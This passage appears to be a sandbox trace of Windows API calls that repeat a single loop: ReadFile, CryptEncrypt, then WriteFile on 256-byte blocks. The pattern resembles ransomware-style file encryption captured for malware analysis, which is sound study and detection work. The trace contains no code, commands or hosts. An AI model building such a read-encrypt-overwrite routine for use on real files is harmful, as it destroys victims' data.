ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.372] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.372] GetLastError () returned 0x0 [0149.372] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.372] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.373] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.373] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.373] GetLastError () returned 0x0 [0149.373] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.374] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.374] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.374] GetLastError () returned 0x0 [0149.374] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.375] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.375] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.376] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.376] GetLastError () returned 0x0 [0149.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, 